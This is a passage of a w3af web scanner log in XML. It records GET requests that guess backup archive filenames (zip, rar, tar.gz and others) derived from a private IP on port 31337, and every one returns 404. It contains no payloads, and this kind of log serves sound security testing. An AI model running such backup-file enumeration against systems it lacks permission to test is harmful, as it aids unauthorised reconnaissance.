                </http-response>
            </http-transaction>
            <http-transaction id="230">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="231">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="232">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="233">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="234">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="235">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="237">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="238">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="239">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="240">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="241">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="242">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="243">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="244">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="245">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="246">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="247">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="248">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="249">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="250">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="252">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
